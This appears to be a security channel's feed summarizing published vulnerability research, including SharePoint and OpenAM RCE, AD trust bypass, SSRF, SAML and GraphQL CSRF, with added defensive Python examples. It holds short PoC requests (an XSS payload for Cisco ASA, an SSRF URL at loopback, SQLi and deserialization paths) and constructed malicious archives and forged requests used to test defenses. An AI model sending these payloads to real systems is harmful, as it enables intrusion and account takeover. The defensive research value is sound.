PT SWARM
Positive Technologies Offensive Team: twitter.com/ptswarm

This is the channel where we share articles/vulnerabilities/scripts/etc, not necessarily authored by us, that we find interesting
CVE-2021-31181: Microsoft SharePoint webpart interpretation conflict RCE vulnerability

To quote @thezdi: "this vulnerability could be used by an authenticated user to execute arbitrary code on the server in the context of the service account of the SharePoint web application. For a successful attack, the attacker must have SPBasePermissions.ManageLists permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permission."

Contents:
• The Vulnerability
• Proof of Concept
• Getting Remote Code Execution
• Conclusion

https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability
"Active Directory forest trusts part 2 - Trust transitivity and finding a trust bypass" by @_dirkjan.

A detailed description of CVE-2020-0665, a logic flaw that allowed SID filtering to be bypassed across forest trusts, leading to the compromise of hosts in transitively trusted forests.

Contents:
• Some important points
• Forging inter-realm tickets and Wireshark debugging
• Do you need to use inter-realm tickets?
• Which keys do I need for inter-realm tickets
• Debugging Kerberos the easy way
• Trust transitivity
• Trust transitivity - new domain discovery
• Trust transitivity, adding our own SIDs to the trust
• How many domains are there in a domain?
• Do you trust this domain? [Y/n]
• Designing a new forest trust attack
• Executing the forest trust bypass
• Obtaining the local SID
• Becoming a domain
• Executing the chain
• Disclosure and patch notes

https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/
LEXSS: Bypassing Lexical Parsing Security Controls
👤 by Chris Davis of @Bishop Fox

"By using special HTML tags that leverage HTML parsing logic, it is possible to achieve cross-site scripting (XSS) even in instances where lexical parsers are used to nullify dangerous content. The primary goal in exploiting these types of XSS vulnerabilities is to get the sanitizing lexical parser to view the data as text data and not computer instructions (e.g., JavaScript instructions)."

📝 Contents:
• Introduction to Key Concepts
• Cross-site Scripting (XSS) Protections
• Cross-site Scripting (XSS) Protections via Lexical Parsing
• How the Data Flows Through the HTML Parser
• The Concept of the HTML Parser's Context State
• Namespaces – Foreign Content and Leveraging the Unexpected Behavior
• Sanitizing Lexical Parsing Flow
• Test Case 1 = TinyMCE XSS
• Test Case 2 = Froala XSS
• Prevention
• Conclusion
• Resources

Read the article
PoC for XSS in Cisco ASA (CVE-2020-3580)

POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: ciscoASA.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

SAMLResponse="><svg/onload=alert('PTSwarm')>
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
👤 by Michael Stepankin aka @artsploit

The story of discovering and exploiting a Java deserialization vulnerability leading to RCE in ForgeRock OpenAM.

PoC: GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=[serialized_object]

📝 Contents:
• The Story
• Obtaining Code & Decompiling
• Source code analysis
• Jato
• Testing on bug bounty (and failing)
• Building a custom gadget chain
• Let's get this bread
• The patch
• Key takeaways

https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
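The `..;/` in the PoC path is the generic Tomcat path-parameter trick rather than anything OpenAM-specific: a check that looks at the raw request URI sees a path under /openam/oauth2/, while the servlet container strips the `;...` path parameter from each segment and resolves `..`, so the request is actually routed to /openam/ccversion/Version (which filter that sidesteps in OpenAM is explained in the article). The following is an added example, not code from the article or from OpenAM, that reproduces that normalization and shows why a prefix allow-list must be evaluated on the normalized path. `tomcat_style_normalize`, `UNAUTHENTICATED_PREFIXES` and the two filter functions are hypothetical names for the demo.

```python
from urllib.parse import unquote


def tomcat_style_normalize(raw_path: str) -> str:
    """Approximate the path the servlet container uses for routing.

    Per segment: drop the ';param=value' path parameter, percent-decode,
    then resolve '.' and '..'. A decoded '/' or '\\' inside a segment is
    rejected, mirroring the container default of refusing encoded slashes.
    """
    if not raw_path.startswith("/"):
        raise ValueError("expected an absolute path")
    stack = []
    for segment in raw_path.split("/"):
        segment = unquote(segment.split(";", 1)[0])
        if "/" in segment or "\\" in segment:
            raise ValueError("encoded path separator inside a segment")
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:
                raise ValueError("path escapes the context root")
            stack.pop()
            continue
        stack.append(segment)
    return "/" + "/".join(stack)


UNAUTHENTICATED_PREFIXES = ("/openam/oauth2/",)   # hypothetical allow-list


def allowed_without_auth_naive(raw_path: str) -> bool:
    """Filter that decides on the raw request URI only."""
    return raw_path.startswith(UNAUTHENTICATED_PREFIXES)


def allowed_without_auth_fixed(raw_path: str) -> bool:
    """Same policy, evaluated on the path the container will actually route."""
    try:
        path = tomcat_style_normalize(raw_path)
    except ValueError:
        return False
    return path.startswith(UNAUTHENTICATED_PREFIXES)


if __name__ == "__main__":
    probe = "/openam/oauth2/..;/ccversion/Version"
    print("routed to:", tomcat_style_normalize(probe))
    print("naive filter lets it through:", allowed_without_auth_naive(probe))
    print("fixed filter lets it through:", allowed_without_auth_fixed(probe))
```

The same discrepancy exists for `%2e%2e` and for `..;anything=here`; the only robust option is to apply authorization on the container's own view of the path (in a servlet filter, that is `getServletPath()`/`getPathInfo()` rather than `getRequestURI()`), or to reject any request whose raw URI contains `;` or `..` before it reaches the application.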
RARLAB fixed a MITM (CVE-2021-35052) in WinRAR found by our researcher Igor Sak-Sakovskiy.

This attack could be leveraged to achieve code execution on a user's machine.

Advisory: https://win-rar.com/singlenewsview.html?L=0&tx_ttnews%5Btt_news%5D=165&cHash=1
PoC for SSRF in IBM QRadar SIEM (CVE-2020-4786)

GET /console/chartServer?output=image&data=http://127.0.0.1:8080
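The `data` parameter above is a server-side fetch of a caller-supplied URL, and the PoC simply points it at the loopback interface. As an added example, not from the advisory or from QRadar, here is the kind of destination check a practitioner would put in front of such a fetch: scheme allow-list, no credentials in the URL, a small port allow-list, and every address the host resolves to must be public, with loopback, RFC 1918, link-local (which covers the 169.254.169.254 metadata address), multicast and IPv4-mapped IPv6 forms rejected. The resolver is injectable so the check can be exercised offline; `FAKE_DNS` and `fake_resolver` are constructed for the demo.

```python
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]


def system_resolver(host: str) -> list:
    """Resolve with the OS resolver, returning every address rather than the first."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_public(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False            # unparsable (e.g. decimal "2130706433") is treated as unsafe
    # ::ffff:127.0.0.1 and friends must be judged as the embedded IPv4 address
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # is_global alone is not enough on older Pythons (224/4 is not "private"), so be explicit
    return ip.is_global and not (
        ip.is_loopback or ip.is_private or ip.is_link_local
        or ip.is_multicast or ip.is_reserved or ip.is_unspecified
    )


def safe_fetch_target(url: str, resolve: Resolver = system_resolver,
                      allowed_ports=(80, 443)) -> tuple:
    """Return (ok, reason); ok is True only when every resolved address is public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in allowed_ports:
        return False, f"port not allowed: {port}"
    try:
        addrs = list(resolve(parts.hostname))
    except (socket.gaierror, ValueError):
        return False, "unresolvable host"
    if not addrs:
        return False, "unresolvable host"
    for addr in addrs:
        if not _is_public(addr):
            return False, f"{parts.hostname} resolves to non-public {addr}"
    return True, "ok"


FAKE_DNS = {                                   # constructed table for the offline demo
    "cdn.example": ["93.184.216.34"],
    "internal.corp.example": ["10.20.30.40"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],   # one public, one loopback record
    "metadata.example": ["169.254.169.254"],
}


def fake_resolver(host: str) -> list:
    return FAKE_DNS.get(host, [host])          # IP literals fall through unchanged


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:8080", "http://127.0.0.1/",
                      "https://cdn.example/chart.png", "http://rebind.example/",
                      "http://[::ffff:127.0.0.1]/", "http://metadata.example/latest/"):
        print(candidate, "->", safe_fetch_target(candidate, fake_resolver))
```

Two caveats a check like this cannot cover on its own: the fetch must connect to the address that was vetted (pinning it, or resolving once and passing the IP to the HTTP client), otherwise a second lookup by the client is a DNS-rebinding race; and HTTP redirects must be re-validated hop by hop, since a public host can 302 to 127.0.0.1.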
CVE-2021-28474: SHAREPOINT RCE VIA SERVER-SIDE CONTROL INTERPRETATION CONFLICT
👤 by @thezdi

The vulnerability allows authenticated users to execute arbitrary .NET code on the server in the context of the service account of the SharePoint web application. By default, authenticated SharePoint users have all necessary permissions.

📝 Contents:
• The Vulnerability
• Exploitation
• Proof of Concept
• Getting Remote Code Execution
• Conclusion

https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict
Remote code execution in cdnjs of Cloudflare
👤 by @ryotkak

A path traversal in Cloudflare's cdnjs library update server during archive extraction could be used to execute arbitrary commands, and as a result cdnjs could be completely compromised, affecting around 12.7% of all websites on the internet once caches expired.

📝 Contents:
• Preface
• TL;DR
• About cdnjs
• Reason for investigation
• Initial investigation
• Investigation of automatic update
• Path traversal
• Demonstration of vulnerability
• Incident
• Determinate impact
• Conclusion
• Timeline

https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
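The cdnjs bug was a path traversal during archive extraction. As an added example, not the cdnjs code (which is Go) and not from the write-up, here is a Python extractor that vets every tar member before anything is written: names are resolved against the destination and must stay inside it, symlinks and hardlinks are refused outright (a link written early can redirect a later member's write outside the destination), and anything that is not a regular file or directory is dropped. The archive is constructed inline and contains a `../` entry and an absolute symlink so the rejection paths run offline.

```python
import io
import os
import tarfile
import tempfile


def _inside(base: str, candidate: str) -> bool:
    """True if candidate, after resolving '..' and symlinks, stays under base."""
    base = os.path.realpath(base)
    candidate = os.path.realpath(candidate)
    return os.path.commonpath([base, candidate]) == base


def vet_members(tar: tarfile.TarFile, dest: str):
    """Split members into (accepted, rejected); rejected carries (name, reason)."""
    accepted, rejected = [], []
    for m in tar.getmembers():
        if os.path.isabs(m.name) or not _inside(dest, os.path.join(dest, m.name)):
            rejected.append((m.name, "path escapes destination"))
        elif m.issym() or m.islnk():
            rejected.append((m.name, f"link to {m.linkname!r} refused"))
        elif not (m.isfile() or m.isdir()):
            rejected.append((m.name, "not a regular file or directory"))
        else:
            accepted.append(m)
    return accepted, rejected


def safe_extract(tar_bytes: bytes, dest: str):
    """Extract only vetted members into dest; return (accepted names, rejected)."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        accepted, rejected = vet_members(tar, dest)
        # Python 3.12+ ships its own 'data' filter; use it as a second layer when present
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(path=dest, members=accepted, **kwargs)
    return [m.name for m in accepted], rejected


def build_malicious_tar() -> bytes:
    """Constructed archive: one benign file, one '../' escape, one absolute symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        add_file("package/lib.js", b"module.exports = 1;\n")
        add_file("package/../../../tmp/owned.sh", b"#!/bin/sh\nid\n")
        link = tarfile.TarInfo("package/passwd")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/passwd"
        tar.addfile(link)
    return buf.getvalue()


def demo() -> dict:
    dest = tempfile.mkdtemp(prefix="cdn-extract-")
    accepted, rejected = safe_extract(build_malicious_tar(), dest)
    return {
        "dest": dest,
        "accepted": accepted,
        "rejected": sorted(name for name, _ in rejected),
        "benign_written": os.path.isfile(os.path.join(dest, "package", "lib.js")),
    }


if __name__ == "__main__":
    print(demo())
```

The check deliberately runs over the whole member list before the first write, because the dangerous orderings (link first, file through the link second) cannot be caught by inspecting members one at a time while extracting. Zip archives need the same treatment; `zipfile` performs no such vetting either.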
PoC for a boolean-based SQLi in Rapid7 Nexpose <= 6.6.48 (CVE-2020-7383)

https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]
Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤 by Bharat Jogi

"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."

📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)

https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq
You should turn off autofill in your password manager
👤 by @marektoth

11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best practices, could be compromised with a single mouse click by the user, giving attackers access to the plain-text saved login credentials.

📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion

https://marektoth.com/blog/password-managers-autofill/
NTLM relaying to AD CS - On certificates, printers and a little hippo
👤 by @_dirkjan

More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.

📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools

https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
✍️ We would like to share with the community some uncommon but not unique cases from our experience. Let us know if you like this format.

Stored XSS using .xbl files.
SAML is insecure by design
👤 by @joonas_fi

"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."

📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading

https://joonas.fi/2021/08/saml-is-insecure-by-design/
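The principle quoted above (sign a computed value, and any difference between the signer's computation and the consumer's becomes exploitable) has a concrete, well-known instance: XML-DSig signs the canonicalized form of the assertion, inclusive canonicalization drops XML comments, and many SAML consumers read the NameID with a call that returns only the first text node. The following is an added example, not from the article or from any SAML library, that models both sides with the standard library: the "signature" is an HMAC over `ElementTree.canonicalize` output (a stand-in for the real RSA XML-DSig), the assertion strings are constructed, and the attacker holds a legitimate account whose name has the victim's name as a prefix.

```python
import hashlib
import hmac
from xml.dom import Node, minidom
from xml.etree import ElementTree as ET

SIGNING_KEY = b"constructed-idp-key"   # stand-in for the IdP's private key

# Constructed: the IdP legitimately issued this assertion for the attacker's own account
ORIGINAL = ("<Assertion><Subject><NameID>"
            "alice@corp.example.attacker.example"
            "</NameID></Subject></Assertion>")
# The same assertion with an empty XML comment spliced into the NameID text
TAMPERED = ("<Assertion><Subject><NameID>"
            "alice@corp.example<!---->.attacker.example"
            "</NameID></Subject></Assertion>")


def canonical(xml_text: str) -> str:
    """Canonical XML 1.0 without comments, as XML-DSig references normally use."""
    return ET.canonicalize(xml_data=xml_text, with_comments=False)


def sign(xml_text: str, key: bytes = SIGNING_KEY) -> str:
    return hmac.new(key, canonical(xml_text).encode(), hashlib.sha256).hexdigest()


def verify(xml_text: str, signature: str, key: bytes = SIGNING_KEY) -> bool:
    return hmac.compare_digest(sign(xml_text, key), signature)


def _nameid_element(xml_text: str):
    return minidom.parseString(xml_text).getElementsByTagName("NameID")[0]


def nameid_naive(xml_text: str) -> str:
    """The common bug: firstChild.nodeValue yields only the text before the comment."""
    return _nameid_element(xml_text).firstChild.nodeValue


def nameid_strict(xml_text: str) -> str:
    """Refuse any NameID whose content is not exactly one text node."""
    children = _nameid_element(xml_text).childNodes
    if len(children) != 1 or children[0].nodeType != Node.TEXT_NODE:
        raise ValueError("NameID must be a single text node")
    return children[0].nodeValue


def demo() -> dict:
    signature = sign(ORIGINAL)            # issued for the attacker's own account
    try:
        strict = nameid_strict(TAMPERED)
    except ValueError as exc:
        strict = f"rejected: {exc}"
    return {
        "tampered_signature_valid": verify(TAMPERED, signature),
        "naive_identity": nameid_naive(TAMPERED),   # the victim's name
        "strict_identity": strict,
    }


if __name__ == "__main__":
    print(demo())
```

The signature check passes on the tampered document because the signed bytes, with comments removed, are identical to the original; the consumer then acts on a value the signer never produced. The fix is not a better comment filter but closing the gap between the two computations: extract the identity from the same canonicalized form that was verified, or reject any mixed content in the elements you rely on, as `nameid_strict` does.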
Site-wide CSRF using the GraphQL API
MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy.

RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith.

Advisory: https://mybb.com/versions/1.8.25/
🙈🙉🙊 Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE!

Current: https://support.citrix.com/article/CTX267027

Mar 2021: http://web.archive.org/web/20210321090412/https://support.citrix.com/article/CTX267027
PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
👤 by Simon Zuckerbraun

With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users, for example copying all emails addressed to a target account and forwarding them to an attacker-controlled account. The vulnerability arises due to the authentication module not being loaded on the back end.

📝 Contents:
• The Trigger
• Understanding the Root Cause
• Bagging a Canary
• Conclusion

https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
Exploiting GraphQL
👤 by @infosec_au

Overview of GraphQL attacks.

📝 Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion

https://blog.assetnote.io/2021/08/29/exploiting-graphql/
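The CSRF section above, and the "Site-wide CSRF using the GraphQL API" post earlier on this page, come down to one question: can a browser on an attacker's page deliver the request with the victim's cookies without triggering a CORS preflight? A GraphQL endpoint that accepts a query via GET, or via POST with a form or text/plain body, is forgeable from any origin. The following is an added example, not from the article or from any GraphQL server, that builds the two forged requests a browser would actually send (including the `enctype="text/plain"` trick that hides the form's `=` inside a throwaway JSON field) and contrasts a permissive parser with a hardened gate. The `Request` class, endpoint, mutation and the `X-Requested-With` requirement are constructed for the demo.

```python
import json
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlencode, urlsplit

ENDPOINT = "https://api.example/graphql"              # constructed
MUTATION = 'mutation { setEmail(email: "attacker@evil.example") { ok } }'


@dataclass
class Request:
    """Constructed stand-in for a framework request object."""
    method: str
    url: str
    headers: dict = field(default_factory=dict)
    body: str = ""

    def header(self, name: str) -> str:
        return next((v for k, v in self.headers.items() if k.lower() == name.lower()), "")


def forged_get(query: str) -> Request:
    """What an <img src=...> or a top-level navigation from an attacker page sends."""
    return Request("GET", f"{ENDPOINT}?{urlencode({'query': query})}",
                   {"Cookie": "session=victim", "Sec-Fetch-Site": "cross-site"})


def forged_text_plain_post(query: str) -> Request:
    """A <form enctype="text/plain"> submission: the body is 'name=value\\r\\n' with no
    escaping, so the '=' is hidden inside a throwaway JSON field and the body still parses."""
    name = json.dumps({"query": query})[:-1] + ', "pad": "'
    value = '"}'
    return Request("POST", ENDPOINT,
                   {"Cookie": "session=victim", "Content-Type": "text/plain",
                    "Sec-Fetch-Site": "cross-site"},
                   f"{name}={value}\r\n")


def legitimate_post(query: str) -> Request:
    return Request("POST", ENDPOINT,
                   {"Cookie": "session=victim", "Content-Type": "application/json",
                    "X-Requested-With": "XMLHttpRequest", "Sec-Fetch-Site": "same-origin"},
                   json.dumps({"query": query}))


def extract_query_legacy(req: Request):
    """Permissive parsing that makes an endpoint forgeable: query from the GET string,
    or any POST body that parses as JSON or as a form, whatever the Content-Type says."""
    if req.method == "GET":
        values = parse_qs(urlsplit(req.url).query).get("query")
        return values[0] if values else None
    if req.method == "POST":
        try:
            return json.loads(req.body).get("query")
        except (ValueError, AttributeError):
            values = parse_qs(req.body).get("query")
            return values[0] if values else None
    return None


def extract_query_hardened(req: Request):
    """Accept only POST + application/json + a custom header, and refuse anything the
    browser labels cross-site. Every request that passes needs a CORS preflight, which a
    foreign origin fails unless the CORS policy itself is misconfigured."""
    if req.method != "POST":
        return None, "GraphQL accepts POST only"
    ctype = req.header("Content-Type").split(";")[0].strip().lower()
    if ctype != "application/json":
        return None, f"content type {ctype or '(none)'} not accepted"
    if req.header("Sec-Fetch-Site") == "cross-site":
        return None, "browser marked the request cross-site"
    if not req.header("X-Requested-With"):          # any custom header works
        return None, "missing custom header"
    return json.loads(req.body)["query"], "ok"


def demo() -> dict:
    return {
        "legacy_get": extract_query_legacy(forged_get(MUTATION)),
        "legacy_text_plain": extract_query_legacy(forged_text_plain_post(MUTATION)),
        "hardened_get": extract_query_hardened(forged_get(MUTATION))[1],
        "hardened_text_plain": extract_query_hardened(forged_text_plain_post(MUTATION))[1],
        "hardened_legit": extract_query_hardened(legitimate_post(MUTATION))[0],
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Note that the legacy parser returns the full mutation from the text/plain body: a JSON parser does not care what the Content-Type header said, which is exactly why the hardened gate checks the header before parsing. Sec-Fetch-Site is only a second layer (older clients do not send it); the custom-header requirement is what forces the preflight.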